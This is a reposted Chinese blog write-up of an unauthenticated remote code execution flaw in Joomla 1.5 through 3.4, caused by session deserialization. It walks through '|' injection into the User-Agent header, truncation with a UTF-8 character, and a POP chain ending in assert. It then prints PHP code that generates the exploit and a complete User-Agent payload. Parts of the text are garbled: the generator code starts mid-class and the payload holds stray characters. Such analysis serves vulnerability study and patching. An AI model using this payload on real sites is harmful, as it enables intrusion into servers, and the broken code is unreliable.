IT工程師數位筆記本

說一下這個漏洞的影響和觸發、利用方法。這個漏洞影響Joomla 1.5 to 3.4全版本，并且利用漏洞無需登錄，只需要發送兩次數據包即可（第一次：將session插入數據庫中，第二次發送同樣的數據包來取出session、觸發漏洞、執行任意代碼），后果是直接導致任意代碼執行。

0x00 漏洞點 —— 反序列化session

這個漏洞存在于反序列化session的過程中。

漏洞存在于 libraries/joomla/session/session.php 中，_validate函數，將ua和xff調用set方法設置到了session中（session.client.browser和session.client.forwarded）

#!phpprotected function _validate($restart = false)    {        ...        // Record proxy forwarded for in the session in case we need it later        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))        {            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);        }        ...        // Check for clients browser        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))        {            $browser = $this->get('session.client.browser');            if ($browser === null)            {                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);            }            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)            {                // @todo remove code: $this->_state = 'error';                // @todo remove code: return false;            }

最終跟隨他們倆進入數據庫，session表：

正常情況下，不存在任何問題。因為我們控制的只是反序列化對象中的一個字符串，不會觸發反序列相關的漏洞。 但是，因為一個小姿勢，導致后面我們可以控制整個反序列化對象。

0x01 利用|字符偽造，控制整個反序列化字符串

首先，我們需要先看看@Ryat老師的pch-013： https://github.com/80vul/phpcodz/blob/master/research/pch-013.md
和pch-013中的情況類似，joomla也沒有采用php自帶的session處理機制，而是用多種方式（包括database、memcache等）自己編寫了存儲session的容器（storage）。

其存儲格式為『鍵名 ＋ 豎線 ＋ 經過 serialize() 函數反序列處理的值』，未正確處理多個豎線的情況。
那么，我們這里就可以通過注入一個"|"符號，將它前面的部分全部認為是name，而|后面我就可以插入任意serialize字符串，構造反序列化漏洞了。

但還有一個問題，在我們構造好的反序列化字符串后面，還有它原本的內容，必須要截斷。而此處并不像SQL注入，還有注釋符可用。 不知各位是否還記得當年wordpress出過的一個XSS，當時就是在插入數據庫的時候利用"%F0%9D%8C%86"字符將mysql中utf-8的字段截斷了。

這里我們用同樣的方法，在session進入數據庫的時候就截斷后面的內容，避免對我們反序列化過程造成影響。

0x02 構造POP執行鏈，執行任意代碼

在可以控制反序列化對象以后，我們只需構造一個能夠一步步調用的執行鏈，即可進行一些危險的操作了。 exp構造的執行鏈，分別利用了如下類：

JDatabaseDriverMysqliSimplePie

我們可以在JDatabaseDriverMysqli類的析構函數里找到一處敏感操作：

#!php    public function __destruct()    {        $this->disconnect();    }    ...    public function disconnect()    {        // Close the connection.        if ($this->connection)        {            foreach ($this->disconnectHandlers as $h)            {                call_user_func_array($h, array( &$this));            }            mysqli_close($this->connection);        }        $this->connection = null;    }

當exp對象反序列化后，將會成為一個JDatabaseDriverMysqli類對象，不管中間如何執行，最后都將會調用__destruct，__destruct將會調用disconnect，disconnect里有一處敏感函數：call_user_func_array。
但很明顯，這里的call_user_func_array的第二個參數，是我們無法控制的。所以不能直接構造assert+eval來執行任意代碼。
于是這里再次調用了一個對象：SimplePie類對象，和它的init方法組成一個回調函數[new SimplePie(), 'init']，傳入call_user_func_array。 跟進init方法：

#!phpfunction init()    {        // Check absolute bare minimum requirements.        if ((function_exists('version_compare') && version_compare(PHP_VERSION, '4.3.0', '<')) || !extension_loaded('xml') || !extension_loaded('pcre'))        {            return false;        }        ...        if ($this->feed_url !== null || $this->raw_data !== null)        {            $this->data = array();            $this->multifeed_objects = array();            $cache = false;            if ($this->feed_url !== null)            {                $parsed_feed_url = SimplePie_Misc::parse_url($this->feed_url);                // Decide whether to enable caching                if ($this->cache && $parsed_feed_url['scheme'] !== '')                {                    $cache = call_user_func(array($this->cache_class, 'create'), $this->cache_location, call_user_func($this->cache_name_function, $this->feed_url), 'spc');                }

很明顯，其中這兩個call_user_func將是觸發代碼執行的元兇。 所以，我將其中第二個call_user_func的第一個參數cache_name_function，賦值為assert，第二個參數賦值為我需要執行的代碼，就構造好了一個『回調后門』。
所以，exp是怎么生成的？給出我寫的生成代碼：

#!phpfeed_url = "phpinfo();JFactory::getConfig();exit;";        $this->javascript = 9999;        $this->cache_name_function = "assert";        $this->sanitize = new JDatabaseDriverMysql();        $this->cache = true;    }}class JDatabaseDriverMysqli {    protected $a;    protected $disconnectHandlers;    protected $connection;    function __construct()    {        $this->a = new JSimplepieFactory();        $x = new SimplePie();        $this->connection = 1;        $this->disconnectHandlers = [            [$x, "init"],        ];    }}$a = new JDatabaseDriverMysqli();echo serialize($a);

將這個代碼生成的exp，以前面提到的注入『|』的變換方式，帶入前面提到的user-agent中，即可觸發代碼執行。 其中，我們需要將char(0)*char(0)替換成\0\0\0，因為在序列化的時候，protected類型變量會被轉換成\0*\0name的樣式，這個替換在源代碼中也可以看到：

#!php$result = str_replace('\0\0\0', chr(0) . '*' . chr(0), $result);

構造的時候遇到一點小麻煩，那就是默認情況下SimplePie是沒有定義的，這也是為什么我在調用SimplePie之前先new了一個JSimplepieFactory的原因，因為JSimplepieFactory對象在加載時會調用import函數將SimplePie導入到當前工作環境：

而JSimplepieFactory有autoload，所以不再需要其他include來對其進行加載。 給出我最終構造的POC（既是上訴php代碼生成的POC）：

#!phpUser-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"ρhιτhσπpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}e???

給一張代碼成功執行的POC：

0x03 影響版本 & 修復方案

1.5 to 3.4全版本

更新到3.4.6版本

就愛閱讀www.92to.com網友整理上傳,為您提供最全的知識大全,期待您的分享，轉載請注明出處。
歡迎轉載：http://www.kanwencang.com/bangong/20161116/56057.html

文章列表

不含病毒。www.avast.com